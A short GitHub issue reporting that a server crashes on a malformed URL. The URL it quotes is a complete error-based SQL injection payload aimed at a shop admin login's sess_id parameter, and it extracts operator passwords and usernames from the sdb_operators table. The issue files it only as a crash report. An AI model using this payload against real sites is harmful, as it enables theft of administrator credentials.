server crash on bad url!
ZhangHanDong opened this issue · 0 comments
ZhangHanDong commented
server crash when the following url:
http:www.xxx.com/v1/login//shopadmin/index.php?ctl=passport&act=login&sess_id=1'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(userpass,0x7e,username,0x7e,op_id)%20from%20sdb_operators%20order%20by%20username%20limit%200,1)%20)%20from%20`information_schema`.tables%20limit%200,1),floor(rand(0)*2))x%20from%20`information_schema`.tables%20group%20by%20x)a)%20and%20'1'='1